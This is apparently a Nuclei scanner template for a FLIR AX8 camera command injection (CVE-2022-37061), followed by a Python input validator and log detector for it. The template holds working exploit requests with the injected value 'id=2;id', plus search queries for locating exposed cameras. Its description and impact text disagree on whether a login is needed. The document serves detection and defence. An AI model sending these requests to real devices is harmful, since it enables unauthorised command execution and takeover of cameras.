id: CVE-2022-37061

info:
  name: FLIR AX8 1.46.16 - Remote Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability. The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized, allowing attackers to inject and execute arbitrary OS commands.
  impact: |
    Authenticated attackers can execute arbitrary OS commands on FLIR AX8 thermal imaging cameras through command injection in the alarm functionality's id parameter, potentially gaining complete control over the camera system and connected infrastructure.
  remediation: |
    Upgrade to the latest version of FLIR AX8 that addresses this vulnerability. Implement proper input validation and sanitization for all user-supplied data.
  reference:
    - https://www.exploit-db.com/exploits/52240
    - https://www.flir.com/products/ax8-automation/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-37061
    cwe-id: CWE-78
    epss-score: 0.93519
    epss-percentile: 0.99835
  metadata:
    verified: true
    max-request: 1
    vendor: flir
    product: ax8
    shodan-query: title:"FLIR"
    fofa-query: app="FLIR-AX8"
  tags: cve,cve2022,flir,ax8,rce,authenticated,vkev,vuln

http:
  - raw:
      - |
        POST /login/dologin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_name={{username}}&user_password={{password}}

      - |
        POST /res.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=alarm&id=2;id

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=([0-9(a-z)]+)'
          - 'gid=([0-9(a-z)]+)'
          - 'visualBeep'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100edaff414faf5330feac3bbe024702c7a415675c4dd8e3efb1ca4e13acb550c190221008781fc7366fda399e88704e4868317458b59640ab18e905621eb53ed587fe839:922c64590222798bb761d5b6d8e72950
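The remediation above calls for input validation on the alarm id. As an added example that is not part of this template or of the vendor's firmware, the Python below shows a server-side allow-list check for the 'id' parameter of action=alarm, plus a log-side detector that flags POSTs to /res.php whose id is anything other than a short decimal number, including percent-encoded metacharacters. The (method, path, body) log shape and the six-digit bound are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Allow-list for the alarm id: a short decimal number and nothing else (bound is an assumption).
ALARM_ID = re.compile(r"[0-9]{1,6}")

def is_valid_alarm_id(raw_id: str) -> bool:
    """Server-side check for the 'id' parameter of action=alarm.
    Values such as '2;id' (or '2%3Bid' once decoded) are rejected before
    they can ever be interpolated into an OS command."""
    return ALARM_ID.fullmatch(raw_id) is not None

def parse_form(body: str) -> dict:
    """Minimal x-www-form-urlencoded parser. Splits on '&' only, so a ';' stays
    inside the value, and percent-decodes so encoded metacharacters are not missed."""
    params: dict = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def flag_request(method: str, path: str, body: str) -> bool:
    """True for a POST to /res.php with action=alarm whose id fails the allow-list."""
    if method != "POST" or path.split("?", 1)[0] != "/res.php":
        return False
    params = parse_form(body)
    if params.get("action", [""])[0] != "alarm":
        return False
    return any(not is_valid_alarm_id(v) for v in params.get("id", []))

# Constructed sample entries (method, path, body) standing in for reverse-proxy logs.
SAMPLE_LOG = [
    ("POST", "/res.php", "action=alarm&id=2"),        # benign
    ("POST", "/res.php", "action=alarm&id=2;id"),     # metacharacter in id
    ("POST", "/res.php", "action=alarm&id=2%3Bid"),   # same, percent-encoded
    ("POST", "/res.php", "action=status&id=1"),       # different action
    ("GET",  "/res.php", "action=alarm&id=2;id"),     # wrong method, ignored
]

def scan_log(entries):
    """Return the entries that should raise an alert."""
    return [e for e in entries if flag_request(*e)]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("ALERT", hit)
```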